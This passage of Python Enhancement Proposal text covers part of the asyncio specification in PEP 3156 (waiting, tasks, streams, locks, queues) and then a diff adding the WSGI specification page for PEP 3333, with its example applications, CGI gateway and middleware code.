• asyncio.wait(fs, timeout=None, return_when=ALL_COMPLETED). This is a coroutine that waits for the Futures or coroutines given by fs to complete. Coroutine arguments will be wrapped in Tasks (see below). This returns a Future whose result on success is a tuple of two sets of Futures, (done, pending), where done is the set of original Futures (or wrapped coroutines) that are done (or cancelled), and pending is the rest, i.e. those that are still not done (nor cancelled). Note that with the defaults for timeout and return_when, pending will always be an empty set. Optional arguments timeout and return_when have the same meaning and defaults as for concurrent.futures.wait(): timeout, if not None, specifies a timeout for the overall operation; return_when specifies when to stop. The constants FIRST_COMPLETED, FIRST_EXCEPTION, ALL_COMPLETED are defined with the same values and the same meanings as in PEP 3148:

  • ALL_COMPLETED (default): Wait until all Futures are done (or until the timeout occurs).

  • FIRST_COMPLETED: Wait until at least one Future is done (or until the timeout occurs).

  • FIRST_EXCEPTION: Wait until at least one Future is done (but not cancelled) with an exception set. (The exclusion of cancelled Futures from the condition is surprising, but PEP 3148 does it this way.)

• asyncio.as_completed(fs, timeout=None). Returns an iterator whose values are Futures or coroutines; waiting for successive values waits until the next Future or coroutine from the set fs completes, and returns its result (or raises its exception). The optional argument timeout has the same meaning and default as it does for concurrent.futures.wait(): when the timeout occurs, the next Future returned by the iterator will raise TimeoutError when waited for. Example of use:

      for f in as_completed(fs):
          result = yield from f  # May raise an exception.
          # Use result.

  Note: if you do not wait for the values produced by the iterator, your for loop may not make progress (since you are not allowing other tasks to run).

• asyncio.wait_for(f, timeout). This is a convenience to wait for a single coroutine or Future with a timeout. When a timeout occurs, it cancels the task and raises TimeoutError. To avoid the task cancellation, wrap it in shield().

• asyncio.gather(f1, f2, ...). Returns a Future which waits until all arguments (Futures or coroutines) are done and returns a list of their corresponding results. If one or more of the arguments is cancelled or raises an exception, the returned Future is cancelled or has its exception set (matching what happened to the first argument), and the remaining arguments are left running in the background. Cancelling the returned Future does not affect the arguments. Note that coroutine arguments are converted to Futures using asyncio.async().

• asyncio.shield(f). Wait for a Future, shielding it from cancellation. This returns a Future whose result or exception is exactly the same as the argument; however, if the returned Future is cancelled, the argument Future is unaffected.

  A use case for this function would be a coroutine that caches a query result for a coroutine that handles a request in an HTTP server. When the request is cancelled by the client, we could (arguably) want the query-caching coroutine to continue to run, so that when the client reconnects, the query result is (hopefully) cached. This could be written e.g. as follows:

      @asyncio.coroutine
      def handle_request(self, request):
          ...
          cached_query = self.get_cache(...)
          if cached_query is None:
              cached_query = yield from asyncio.shield(self.fill_cache(...))
          ...
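As a further illustration, here is a sketch using asyncio.wait() to take the first result and cancel the stragglers; the argument coroutines are placeholders:

    @asyncio.coroutine
    def first_of(coro1, coro2):
        done, pending = yield from asyncio.wait(
            [coro1, coro2], return_when=asyncio.FIRST_COMPLETED)
        for task in pending:
            task.cancel()              # cancel whatever is still running
        return next(iter(done)).result()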

Sleeping

The coroutine asyncio.sleep(delay) returns after a given time delay.


Tasks

A Task is an object that manages an independently running coroutine. The Task interface is the same as the Future interface, and in fact Task is a subclass of Future. The task becomes done when its coroutine returns or raises an exception; if it returns a result, that becomes the task’s result; if it raises an exception, that becomes the task’s exception.

Cancelling a task that’s not done yet throws an asyncio.CancelledError exception into the coroutine. If the coroutine doesn’t catch this (or if it re-raises it) the task will be marked as cancelled (i.e., cancelled() will return True); but if the coroutine somehow catches and ignores the exception it may continue to execute (and cancelled() will return False).

Tasks are also useful for interoperating between coroutines and callback-based frameworks like Twisted. After converting a coroutine into a Task, callbacks can be added to the Task.

To convert a coroutine into a task, call the coroutine function and pass the resulting coroutine object to the loop.create_task() method. You may also use asyncio.ensure_future() for this purpose.

You may ask, why not automatically convert all coroutines to Tasks? The @asyncio.coroutine decorator could do this. However, this would slow things down considerably in the case where one coroutine calls another (and so on), as switching to a “bare” coroutine has much less overhead than switching to a Task.

The Task class is derived from Future, adding new methods:

• current_task(loop=None). A class method returning the currently running task in an event loop. If loop is None the method returns the current task for the default loop. Every coroutine is executed inside a task context, either a Task created using ensure_future() or loop.create_task(), or by being called from another coroutine using yield from or await. This method returns None when called outside a coroutine, e.g. in a callback scheduled using loop.call_later().

• all_tasks(loop=None). A class method returning a set of all active tasks for the loop. This uses the default loop if loop is None.
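For example, reusing the compute() coroutine sketched earlier:

    task = loop.create_task(compute(21))  # wrap the coroutine in a Task
    task.add_done_callback(lambda t: print('done:', t.result()))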

The Scheduler

The scheduler has no public interface. You interact with it by using yield from future and yield from task. In fact, there is no single object representing the scheduler – its behavior is implemented by the Task and Future classes using only the public interface of the event loop, so it will work with third-party event loop implementations, too.


Convenience Utilities

A few functions and classes are provided to simplify the writing of basic stream-based clients and servers, such as FTP or HTTP. These are:

• asyncio.open_connection(host, port): A wrapper for EventLoop.create_connection() that does not require you to provide a Protocol factory or class. This is a coroutine that returns a (reader, writer) pair, where reader is an instance of StreamReader and writer is an instance of StreamWriter (both described below).

• asyncio.start_server(client_connected_cb, host, port): A wrapper for EventLoop.create_server() that takes a simple callback function rather than a Protocol factory or class. This is a coroutine that returns a Server object just as create_server() does. Each time a client connection is accepted, client_connected_cb(reader, writer) is called, where reader is an instance of StreamReader and writer is an instance of StreamWriter (both described below). If the result returned by client_connected_cb() is a coroutine, it is automatically wrapped in a Task.

• StreamReader: A class offering an interface not unlike that of a read-only binary stream, except that the various reading methods are coroutines. It is normally driven by a StreamReaderProtocol instance. Note that there should be only one reader. The interface for the reader is:

  • readline(): A coroutine that reads a string of bytes representing a line of text ending in '\n', or until the end of the stream, whichever comes first.

  • read(n): A coroutine that reads up to n bytes. If n is omitted or negative, it reads until the end of the stream.

  • readexactly(n): A coroutine that reads exactly n bytes, or until the end of the stream, whichever comes first.

  • exception(): Return the exception that has been set on the stream using set_exception(), or None if no exception is set.

  The interface for the driver is:

  • feed_data(data): Append data (a bytes object) to the internal buffer. This unblocks a blocked reading coroutine if it provides sufficient data to fulfill the reader’s contract.

  • feed_eof(): Signal the end of the buffer. This unblocks a blocked reading coroutine. No more data should be fed to the reader after this call.

  • set_exception(exc): Set an exception on the stream. All subsequent reading methods will raise this exception. No more data should be fed to the reader after this call.

• StreamWriter: A class offering an interface not unlike that of a write-only binary stream. It wraps a transport. The interface is an extended subset of the transport interface: the following methods behave the same as the corresponding transport methods: write(), writelines(), write_eof(), can_write_eof(), get_extra_info(), close(). Note that the writing methods are _not_ coroutines (this is the same as for transports, but different from the StreamReader class). The following method is in addition to the transport interface:

  • drain(): This should be called with yield from after writing significant data, for the purpose of flow control. The intended use is like this:

        writer.write(data)
        yield from writer.drain()

    Note that this is not technically a coroutine: it returns either a Future or an empty tuple (both can be passed to yield from). Use of this method is optional. However, when it is not used, the internal buffer of the transport underlying the StreamWriter may fill up with all data that was ever written to the writer. If an app does not have a strict limit on how much data it writes, it _should_ call yield from drain() occasionally to avoid filling up the transport buffer.

• StreamReaderProtocol: A protocol implementation used as an adapter between the bidirectional stream transport/protocol interface and the StreamReader and StreamWriter classes. It acts as a driver for a specific StreamReader instance, calling its methods feed_data(), feed_eof(), and set_exception() in response to various protocol callbacks. It also controls the behavior of the drain() method of the StreamWriter instance.
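A sketch of a client built on these utilities; the HTTP details are only illustrative:

    @asyncio.coroutine
    def http_head(host):
        reader, writer = yield from asyncio.open_connection(host, 80)
        writer.write(b'HEAD / HTTP/1.0\r\nHost: ' + host.encode() + b'\r\n\r\n')
        yield from writer.drain()
        status_line = yield from reader.readline()
        writer.close()
        return status_line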

Synchronization

Locks, events, conditions and semaphores modeled after those in the threading module are implemented and can be accessed by importing the asyncio.locks submodule. Queues modeled after those in the queue module are implemented and can be accessed by importing the asyncio.queues submodule.

In general these have a close correspondence to their threaded counterparts; however, blocking methods (e.g. acquire() on locks, put() and get() on queues) are coroutines, and timeout parameters are not provided (you can use asyncio.wait_for() to add a timeout to a blocking call, however).

The docstrings in the modules provide more complete documentation.


Locks

The following classes are provided by asyncio.locks. For all these except Event, the with statement may be used in combination with yield from to acquire the lock and ensure that the lock is released regardless of how the with block is left, as follows:

    with (yield from my_lock):
        ...

• Lock: a basic mutex, with methods acquire() (a coroutine), locked(), and release().

• Event: an event variable, with methods wait() (a coroutine), set(), clear(), and is_set().

• Condition: a condition variable, with methods acquire(), wait(), wait_for(predicate) (all three coroutines), locked(), release(), notify(), and notify_all().

• Semaphore: a semaphore, with methods acquire() (a coroutine), locked(), and release(). The constructor argument is the initial value (default 1).

• BoundedSemaphore: a bounded semaphore; this is similar to Semaphore but the initial value is also the maximum value.

Queues

The following classes and exceptions are provided by asyncio.queues.

• Queue: a standard queue, with methods get(), put() (both coroutines), get_nowait(), put_nowait(), empty(), full(), qsize(), and maxsize().

• PriorityQueue: a subclass of Queue that retrieves entries in priority order (lowest first).

• LifoQueue: a subclass of Queue that retrieves the most recently added entries first.

• JoinableQueue: a subclass of Queue with task_done() and join() methods (the latter a coroutine).

• Empty, Full: exceptions raised when get_nowait() or put_nowait() is called on a queue that is empty or full, respectively.
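A minimal producer/consumer sketch using these queues:

    import asyncio
    from asyncio.queues import Queue

    queue = Queue(maxsize=10)

    @asyncio.coroutine
    def producer():
        for i in range(3):
            yield from queue.put(i)        # suspends while the queue is full

    @asyncio.coroutine
    def consumer():
        for _ in range(3):
            item = yield from queue.get()  # suspends while the queue is empty
            print('got', item)

    loop = asyncio.get_event_loop()
    loop.run_until_complete(asyncio.wait([producer(), consumer()]))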

Miscellaneous


Logging

All logging performed by the asyncio package uses a single logging.Logger object, asyncio.logger. To customize logging you can use the standard Logger API on this object. (Do not replace the object though.)


SIGCHLD handling on UNIX

Efficient implementation of the process_exited() method on subprocess protocols requires a SIGCHLD signal handler. However, signal handlers can only be set on the event loop associated with the main thread. In order to support spawning subprocesses from event loops running in other threads, a mechanism exists to allow sharing a SIGCHLD handler between multiple event loops. There are two additional functions, asyncio.get_child_watcher() and asyncio.set_child_watcher(), and corresponding methods on the event loop policy.

There are two child watcher implementation classes, FastChildWatcher and SafeChildWatcher. Both use SIGCHLD. The SafeChildWatcher class is used by default; it is inefficient when many subprocesses exist simultaneously. The FastChildWatcher class is efficient, but it may interfere with other code (either C code or Python code) that spawns subprocesses without using an asyncio event loop. If you are sure you are not using other code that spawns subprocesses, you can use the fast implementation by running the following in your main thread:

    watcher = asyncio.FastChildWatcher()
    asyncio.set_child_watcher(watcher)

Wish List

(There is agreement that these features are desirable, but no implementation was available when Python 3.4 beta 1 was released, and the feature freeze for the rest of the Python 3.4 release cycle prohibits adding them in this late stage. However, they will hopefully be added in Python 3.5, and perhaps earlier in the PyPI distribution.)

• Support a “start TLS” operation to upgrade a TCP socket to SSL/TLS.

Former wish list items that have since been implemented (but aren’t specified by the PEP):

• UNIX domain sockets.

• A per-loop error handling callback.

Open Issues

(Note that these have been resolved de facto in favor of the status quo by the acceptance of the PEP. However, the PEP’s provisional status allows revising these decisions for Python 3.5.)

• Why do create_connection() and create_datagram_endpoint() have a proto argument but not create_server()? And why are the family, flags, proto arguments for getaddrinfo() sometimes zero and sometimes named constants (whose value is also zero)?

• Do we need another inquiry method to tell whether the loop is in the process of stopping?

• A fuller public API for Handle? What’s the use case?

• A debugging API? E.g. something that logs a lot of stuff, or logs unusual conditions (like queues filling up faster than they drain) or even callbacks taking too much time…

• Do we need introspection APIs? E.g. asking for the read callback given a file descriptor. Or when the next scheduled call is. Or the list of file descriptors registered with callbacks. Right now these all require using internals.

• Do we need more socket I/O methods, e.g. sock_sendto() and sock_recvfrom(), and perhaps others like pipe_read()? I guess users can write their own (it’s not rocket science).

• We may need APIs to control various timeouts. E.g. we may want to limit the time spent in DNS resolution, connecting, ssl/tls handshake, idle connection, close/shutdown, even per session. Possibly it’s sufficient to add timeout keyword arguments to some methods, and other timeouts can probably be implemented by clever use of call_later() and Task.cancel(). But it’s possible that some operations need default timeouts, and we may want to change the default for a specific operation globally (i.e., per event loop).


Acknowledgments

Apart from PEP 3153, influences include PEP 380 and Greg Ewing’s tutorial for yield from, Twisted, Tornado, ZeroMQ, pyftpdlib, and wattle (Steve Dower’s counter-proposal). My previous work on asynchronous support in the NDB library for Google App Engine provided an important starting point.

I am grateful for the numerous discussions on python-ideas from September through December 2012, and many more on python-tulip since then; a Skype session with Steve Dower and Dino Viehland; email exchanges with and a visit by Ben Darnell; an audience with Niels Provos (original author of libevent); and in-person meetings (as well as frequent email exchanges) with several Twisted developers, including Glyph, Brian Warner, David Reid, and Duncan McGreggor.

Contributors to the implementation include Eli Bendersky, Gustavo Carneiro (Gambit Research), Saúl Ibarra Corretgé, Geert Jansen, A. Jesse Jiryu Davis, Nikolay Kim, Charles-François Natali, Richard Oudkerk, Antoine Pitrou, Giampaolo Rodolá, Andrew Svetlov, and many others who submitted bugs and/or fixes.

I thank Antoine Pitrou for his feedback in his role as official PEP BDFL.


Source: https://github.com/python/peps/blob/main/peps/pep-3156.rst


Last modified: 2024-03-21 03:48:43 GMT

diff --git a/pep-3333/index.html b/pep-3333/index.html new file mode 100644 index 00000000000..496c21226ea --- /dev/null +++ b/pep-3333/index.html

PEP 3333 – Python Web Server Gateway Interface v1.0.1

Author: Phillip J. Eby <pje at telecommunity.com>
Discussions-To: Web-SIG list
Status: Final
Type: Informational
Created: 26-Sep-2010
Post-History: 26-Sep-2010, 04-Oct-2010
Replaces: 333

Preface for Readers of PEP 333

This is an updated version of PEP 333, modified slightly to improve usability under Python 3, and to incorporate several long-standing de facto amendments to the WSGI protocol. (Its code samples have also been ported to Python 3.)

While for procedural reasons [6], this must be a distinct PEP, no changes were made that invalidate previously-compliant servers or applications under Python 2.x. If your 2.x application or server is compliant to PEP 333, it is also compliant with this PEP.

Under Python 3, however, your app or server must also follow the rules outlined in the sections below titled “A Note On String Types” and “Unicode Issues”.

For detailed, line-by-line diffs between this document and PEP 333, you may view its SVN revision history [7], from revision 84854 forward.


Abstract

This document specifies a proposed standard interface between web servers and Python web applications or frameworks, to promote web application portability across a variety of web servers.


Original Rationale and Goals (from PEP 333)

Python currently boasts a wide variety of web application frameworks, such as Zope, Quixote, Webware, SkunkWeb, PSO, and Twisted Web – to name just a few [1]. This wide variety of choices can be a problem for new Python users, because generally speaking, their choice of web framework will limit their choice of usable web servers, and vice versa.

By contrast, although Java has just as many web application frameworks available, Java’s “servlet” API makes it possible for applications written with any Java web application framework to run in any web server that supports the servlet API.

The availability and widespread use of such an API in web servers for Python – whether those servers are written in Python (e.g. Medusa), embed Python (e.g. mod_python), or invoke Python via a gateway protocol (e.g. CGI, FastCGI, etc.) – would separate choice of framework from choice of web server, freeing users to choose a pairing that suits them, while freeing framework and server developers to focus on their preferred area of specialization.

This PEP, therefore, proposes a simple and universal interface between web servers and web applications or frameworks: the Python Web Server Gateway Interface (WSGI).

But the mere existence of a WSGI spec does nothing to address the existing state of servers and frameworks for Python web applications. Server and framework authors and maintainers must actually implement WSGI for there to be any effect.

However, since no existing servers or frameworks support WSGI, there is little immediate reward for an author who implements WSGI support. Thus, WSGI must be easy to implement, so that an author’s initial investment in the interface can be reasonably low.

Thus, simplicity of implementation on both the server and framework sides of the interface is absolutely critical to the utility of the WSGI interface, and is therefore the principal criterion for any design decisions.

Note, however, that simplicity of implementation for a framework author is not the same thing as ease of use for a web application author. WSGI presents an absolutely “no frills” interface to the framework author, because bells and whistles like response objects and cookie handling would just get in the way of existing frameworks’ handling of these issues. Again, the goal of WSGI is to facilitate easy interconnection of existing servers and applications or frameworks, not to create a new web framework.

Note also that this goal precludes WSGI from requiring anything that is not already available in deployed versions of Python. Therefore, new standard library modules are not proposed or required by this specification, and nothing in WSGI requires a Python version greater than 2.2.2. (It would be a good idea, however, for future versions of Python to include support for this interface in web servers provided by the standard library.)

In addition to ease of implementation for existing and future frameworks and servers, it should also be easy to create request preprocessors, response postprocessors, and other WSGI-based “middleware” components that look like an application to their containing server, while acting as a server for their contained applications.

If middleware can be both simple and robust, and WSGI is widely available in servers and frameworks, it allows for the possibility of an entirely new kind of Python web application framework: one consisting of loosely-coupled WSGI middleware components. Indeed, existing framework authors may even choose to refactor their frameworks’ existing services to be provided in this way, becoming more like libraries used with WSGI, and less like monolithic frameworks. This would then allow application developers to choose “best-of-breed” components for specific functionality, rather than having to commit to all the pros and cons of a single framework.

Of course, as of this writing, that day is doubtless quite far off. In the meantime, it is a sufficient short-term goal for WSGI to enable the use of any framework with any server.

Finally, it should be mentioned that the current version of WSGI does not prescribe any particular mechanism for “deploying” an application for use with a web server or server gateway. At the present time, this is necessarily implementation-defined by the server or gateway. After a sufficient number of servers and frameworks have implemented WSGI to provide field experience with varying deployment requirements, it may make sense to create another PEP, describing a deployment standard for WSGI servers and application frameworks.

+
+
+

Specification Overview

+

The WSGI interface has two sides: the “server” or “gateway” side, and +the “application” or “framework” side. The server side invokes a +callable object that is provided by the application side. The +specifics of how that object is provided are up to the server or +gateway. It is assumed that some servers or gateways will require an +application’s deployer to write a short script to create an instance +of the server or gateway, and supply it with the application object. +Other servers and gateways may use configuration files or other +mechanisms to specify where an application object should be +imported from, or otherwise obtained.

+

In addition to “pure” servers/gateways and applications/frameworks, +it is also possible to create “middleware” components that implement +both sides of this specification. Such components act as an +application to their containing server, and as a server to a +contained application, and can be used to provide extended APIs, +content transformation, navigation, and other useful functions.

+

Throughout this specification, we will use the term “a callable” to +mean “a function, method, class, or an instance with a __call__ +method”. It is up to the server, gateway, or application implementing +the callable to choose the appropriate implementation technique for +their needs. Conversely, a server, gateway, or application that is +invoking a callable must not have any dependency on what kind of +callable was provided to it. Callables are only to be called, not +introspected upon.

+
+

A Note On String Types

+

In general, HTTP deals with bytes, which means that this specification +is mostly about handling bytes.

+

However, the content of those bytes often has some kind of textual +interpretation, and in Python, strings are the most convenient way +to handle text.

+

But in many Python versions and implementations, strings are Unicode, +rather than bytes. This requires a careful balance between a usable +API and correct translations between bytes and text in the context of +HTTP… especially to support porting code between Python +implementations with different str types.

+

WSGI therefore defines two kinds of “string”:

+
• “Native” strings (which are always implemented using the type named str) that are used for request/response headers and metadata
• “Bytestrings” (which are implemented using the bytes type in Python 3, and str elsewhere), that are used for the bodies of requests and responses (e.g. POST/PUT input data and HTML page outputs).
+

Do not be confused however: even if Python’s str type is actually +Unicode “under the hood”, the content of native strings must +still be translatable to bytes via the Latin-1 encoding! (See +the section on Unicode Issues later in this document for more +details.)

+

In short: where you see the word “string” in this document, it refers +to a “native” string, i.e., an object of type str, whether it is +internally implemented as bytes or unicode. Where you see references +to “bytestring”, this should be read as “an object of type bytes +under Python 3, or type str under Python 2”.

+

And so, even though HTTP is in some sense “really just bytes”, there +are many API conveniences to be had by using whatever Python’s +default str type is.

+
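To make the two kinds of “string” concrete, here is a minimal sketch (illustrative only, not part of the specification) of the Latin-1 round-trip that native strings must survive; the helper names are ours:

def native_to_bytes(s):
    # Header/metadata "strings" must be encodable as Latin-1.
    return s.encode('iso-8859-1')

def bytes_to_native(b):
    # The inverse decoding recovers the original native string.
    return b.decode('iso-8859-1')

header_value = 'text/plain; charset=utf-8'
assert bytes_to_native(native_to_bytes(header_value)) == header_value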
+
+

The Application/Framework Side

+

The application object is simply a callable object that accepts +two arguments. The term “object” should not be misconstrued as +requiring an actual object instance: a function, method, class, +or instance with a __call__ method are all acceptable for +use as an application object. Application objects must be able +to be invoked more than once, as virtually all servers/gateways +(other than CGI) will make such repeated requests.

+

(Note: although we refer to it as an “application” object, this +should not be construed to mean that application developers will use +WSGI as a web programming API! It is assumed that application +developers will continue to use existing, high-level framework +services to develop their applications. WSGI is a tool for +framework and server developers, and is not intended to directly +support application developers.)

+

Here are two example application objects; one is a function, and the +other is a class:

+
HELLO_WORLD = b"Hello world!\n"
+
+def simple_app(environ, start_response):
+    """Simplest possible application object"""
+    status = '200 OK'
+    response_headers = [('Content-type', 'text/plain')]
+    start_response(status, response_headers)
+    return [HELLO_WORLD]
+
+class AppClass:
+    """Produce the same output, but using a class
+
+    (Note: 'AppClass' is the "application" here, so calling it
+    returns an instance of 'AppClass', which is then the iterable
+    return value of the "application callable" as required by
+    the spec.)
+
+    If we wanted to use *instances* of 'AppClass' as application
+    objects instead, we would have to implement a '__call__'
+    method, which would be invoked to execute the application,
+    and we would need to create an instance for use by the
+    server or gateway.
+    """
+
+    def __init__(self, environ, start_response):
+        self.environ = environ
+        self.start = start_response
+
+    def __iter__(self):
+        status = '200 OK'
+        response_headers = [('Content-type', 'text/plain')]
+        self.start(status, response_headers)
+        yield HELLO_WORLD
+
+
+
+
+

The Server/Gateway Side

+

The server or gateway invokes the application callable once for each request it receives from an HTTP client that is directed at the application. To illustrate, here is a simple CGI gateway, implemented as a function taking an application object. Note that this simple example has limited error handling, because by default an uncaught exception will be dumped to sys.stderr and logged by the web server.

+
import os, sys
+
+enc, esc = sys.getfilesystemencoding(), 'surrogateescape'
+
+def unicode_to_wsgi(u):
+    # Convert an environment variable to a WSGI "bytes-as-unicode" string
+    return u.encode(enc, esc).decode('iso-8859-1')
+
+def wsgi_to_bytes(s):
+    return s.encode('iso-8859-1')
+
+def run_with_cgi(application):
+    environ = {k: unicode_to_wsgi(v) for k,v in os.environ.items()}
+    environ['wsgi.input']        = sys.stdin.buffer
+    environ['wsgi.errors']       = sys.stderr
+    environ['wsgi.version']      = (1, 0)
+    environ['wsgi.multithread']  = False
+    environ['wsgi.multiprocess'] = True
+    environ['wsgi.run_once']     = True
+
+    if environ.get('HTTPS', 'off') in ('on', '1'):
+        environ['wsgi.url_scheme'] = 'https'
+    else:
+        environ['wsgi.url_scheme'] = 'http'
+
+    headers_set = []
+    headers_sent = []
+
+    def write(data):
+        out = sys.stdout.buffer
+
+        if not headers_set:
+             raise AssertionError("write() before start_response()")
+
+        elif not headers_sent:
+             # Before the first output, send the stored headers
+             status, response_headers = headers_sent[:] = headers_set
+             out.write(wsgi_to_bytes('Status: %s\r\n' % status))
+             for header in response_headers:
+                 out.write(wsgi_to_bytes('%s: %s\r\n' % header))
+             out.write(wsgi_to_bytes('\r\n'))
+
+        out.write(data)
+        out.flush()
+
+    def start_response(status, response_headers, exc_info=None):
+        if exc_info:
+            try:
+                if headers_sent:
+                    # Re-raise original exception if headers sent
+                    raise exc_info[1].with_traceback(exc_info[2])
+            finally:
+                exc_info = None     # avoid dangling circular ref
+        elif headers_set:
+            raise AssertionError("Headers already set!")
+
+        headers_set[:] = [status, response_headers]
+
+        # Note: error checking on the headers should happen here,
+        # *after* the headers are set.  That way, if an error
+        # occurs, start_response can only be re-called with
+        # exc_info set.
+
+        return write
+
+    result = application(environ, start_response)
+    try:
+        for data in result:
+            if data:    # don't send headers until body appears
+                write(data)
+        if not headers_sent:
+            write(b'')   # send headers now if body was empty
+    finally:
+        if hasattr(result, 'close'):
+            result.close()
+
+
+
+
+

Middleware: Components that Play Both Sides

+

Note that a single object may play the role of a server with respect +to some application(s), while also acting as an application with +respect to some server(s). Such “middleware” components can perform +such functions as:

+
• Routing a request to different application objects based on the target URL, after rewriting the environ accordingly.
• Allowing multiple applications or frameworks to run side by side in the same process
• Load balancing and remote processing, by forwarding requests and responses over a network
• Performing content postprocessing, such as applying XSL stylesheets
+

The presence of middleware in general is transparent to both the +“server/gateway” and the “application/framework” sides of the +interface, and should require no special support. A user who +desires to incorporate middleware into an application simply +provides the middleware component to the server, as if it were +an application, and configures the middleware component to +invoke the application, as if the middleware component were a +server. Of course, the “application” that the middleware wraps +may in fact be another middleware component wrapping another +application, and so on, creating what is referred to as a +“middleware stack”.

+

For the most part, middleware must conform to the restrictions +and requirements of both the server and application sides of +WSGI. In some cases, however, requirements for middleware +are more stringent than for a “pure” server or application, +and these points will be noted in the specification.

+

Here is a (tongue-in-cheek) example of a middleware component that +converts text/plain responses to pig Latin, using Joe Strout’s +piglatin.py. (Note: a “real” middleware component would +probably use a more robust way of checking the content type, and +should also check for a content encoding. Also, this simple +example ignores the possibility that a word might be split across +a block boundary.)

+
from piglatin import piglatin
+
+class LatinIter:
+
+    """Transform iterated output to piglatin, if it's okay to do so
+
+    Note that the "okayness" can change until the application yields
+    its first non-empty bytestring, so 'transform_ok' has to be a mutable
+    truth value.
+    """
+
+    def __init__(self, result, transform_ok):
+        if hasattr(result, 'close'):
+            self.close = result.close
+        self._next = iter(result).__next__
+        self.transform_ok = transform_ok
+
+    def __iter__(self):
+        return self
+
+    def __next__(self):
+        data = self._next()
+        if self.transform_ok:
+            return piglatin(data)   # call must be byte-safe on Py3
+        else:
+            return data
+
+class Latinator:
+
+    # by default, don't transform output
+    transform = False
+
+    def __init__(self, application):
+        self.application = application
+
+    def __call__(self, environ, start_response):
+
+        transform_ok = []
+
+        def start_latin(status, response_headers, exc_info=None):
+
+            # Reset ok flag, in case this is a repeat call
+            del transform_ok[:]
+
+            for name, value in response_headers:
+                if name.lower() == 'content-type' and value == 'text/plain':
+                    transform_ok.append(True)
+                    # Strip content-length if present, else it'll be wrong
+                    response_headers = [(name, value)
+                        for name, value in response_headers
+                            if name.lower() != 'content-length'
+                    ]
+                    break
+
+            write = start_response(status, response_headers, exc_info)
+
+            if transform_ok:
+                def write_latin(data):
+                    write(piglatin(data))   # call must be byte-safe on Py3
+                return write_latin
+            else:
+                return write
+
+        return LatinIter(self.application(environ, start_latin), transform_ok)
+
+
+# Run foo_app under a Latinator's control, using the example CGI gateway
+from foo_app import foo_app
+run_with_cgi(Latinator(foo_app))
+
+
+
+
+
+

Specification Details

+

The application object must accept two positional arguments. For +the sake of illustration, we have named them environ and +start_response, but they are not required to have these names. +A server or gateway must invoke the application object using +positional (not keyword) arguments. (E.g. by calling +result = application(environ, start_response) as shown above.)

+

The environ parameter is a dictionary object, containing CGI-style +environment variables. This object must be a builtin Python +dictionary (not a subclass, UserDict or other dictionary +emulation), and the application is allowed to modify the dictionary +in any way it desires. The dictionary must also include certain +WSGI-required variables (described in a later section), and may +also include server-specific extension variables, named according +to a convention that will be described below.

+

The start_response parameter is a callable accepting two +required positional arguments, and one optional argument. For the sake +of illustration, we have named these arguments status, +response_headers, and exc_info, but they are not required to +have these names, and the application must invoke the +start_response callable using positional arguments (e.g. +start_response(status, response_headers)).

+

The status parameter is a status string of the form +"999 Message here", and response_headers is a list of +(header_name, header_value) tuples describing the HTTP response +header. The optional exc_info parameter is described below in the +sections on The start_response() Callable and Error Handling. +It is used only when the application has trapped an error and is +attempting to display an error message to the browser.

+

The start_response callable must return a write(body_data) +callable that takes one positional parameter: a bytestring to be written +as part of the HTTP response body. (Note: the write() callable is +provided only to support certain existing frameworks’ imperative output +APIs; it should not be used by new applications or frameworks if it +can be avoided. See the Buffering and Streaming section for more +details.)

+

When called by the server, the application object must return an +iterable yielding zero or more bytestrings. This can be accomplished in a +variety of ways, such as by returning a list of bytestrings, or by the +application being a generator function that yields bytestrings, or +by the application being a class whose instances are iterable. +Regardless of how it is accomplished, the application object must +always return an iterable yielding zero or more bytestrings.

+

The server or gateway must transmit the yielded bytestrings to the client +in an unbuffered fashion, completing the transmission of each bytestring +before requesting another one. (In other words, applications +should perform their own buffering. See the Buffering and +Streaming section below for more on how application output must be +handled.)

+

The server or gateway should treat the yielded bytestrings as binary byte +sequences: in particular, it should ensure that line endings are +not altered. The application is responsible for ensuring that the +bytestring(s) to be written are in a format suitable for the client. (The +server or gateway may apply HTTP transfer encodings, or perform +other transformations for the purpose of implementing HTTP features +such as byte-range transmission. See Other HTTP Features, below, +for more details.)

+

If a call to len(iterable) succeeds, the server must be able +to rely on the result being accurate. That is, if the iterable +returned by the application provides a working __len__() +method, it must return an accurate result. (See +the Handling the Content-Length Header section for information +on how this would normally be used.)

+

If the iterable returned by the application has a close() method, +the server or gateway must call that method upon completion of the +current request, whether the request was completed normally, or +terminated early due to an application error during iteration or an early +disconnect of the browser. (The close() method requirement is to +support resource release by the application. This protocol is intended +to complement PEP 342’s generator support, and other common iterables +with close() methods.)

+

Applications returning a generator or other custom iterator should not +assume the entire iterator will be consumed, as it may be closed early +by the server.

+
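For illustration only, here is a sketch (not part of the specification) of a generator-based application that depends on this close() protocol; the file name is hypothetical. The server’s call to close() raises GeneratorExit inside the generator, so the finally clause releases the file even if the client disconnects early:

def streaming_app(environ, start_response):
    start_response('200 OK', [('Content-type', 'application/octet-stream')])
    f = open('body.bin', 'rb')   # hypothetical file name
    try:
        while True:
            block = f.read(8192)
            if not block:
                break
            yield block
    finally:
        # Runs on normal exhaustion *and* when the server calls close()
        # on this generator after an early termination.
        f.close()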

(Note: the application must invoke the start_response() +callable before the iterable yields its first body bytestring, so that the +server can send the headers before any body content. However, this +invocation may be performed by the iterable’s first iteration, so +servers must not assume that start_response() has been called +before they begin iterating over the iterable.)

+

Finally, servers and gateways must not directly use any other +attributes of the iterable returned by the application, unless it is an +instance of a type specific to that server or gateway, such as a “file +wrapper” returned by wsgi.file_wrapper (see Optional +Platform-Specific File Handling). In the general case, only +attributes specified here, or accessed via e.g. the PEP 234 iteration +APIs are acceptable.

+
+

environ Variables

+

The environ dictionary is required to contain these CGI +environment variables, as defined by the Common Gateway Interface +specification [2]. The following variables must be present, +unless their value would be an empty string, in which case they +may be omitted, except as otherwise noted below.

+
+
REQUEST_METHOD
The HTTP request method, such as "GET" or "POST". This +cannot ever be an empty string, and so is always required.
+
SCRIPT_NAME
The initial portion of the request URL’s “path” that corresponds to +the application object, so that the application knows its virtual +“location”. This may be an empty string, if the application +corresponds to the “root” of the server.
+
PATH_INFO
The remainder of the request URL’s “path”, designating the virtual +“location” of the request’s target within the application. This +may be an empty string, if the request URL targets the +application root and does not have a trailing slash.
+
QUERY_STRING
The portion of the request URL that follows the "?", if any. +May be empty or absent.
+
CONTENT_TYPE
The contents of any Content-Type fields in the HTTP request. +May be empty or absent.
+
CONTENT_LENGTH
The contents of any Content-Length fields in the HTTP request. +May be empty or absent.
+
SERVER_NAME, SERVER_PORT
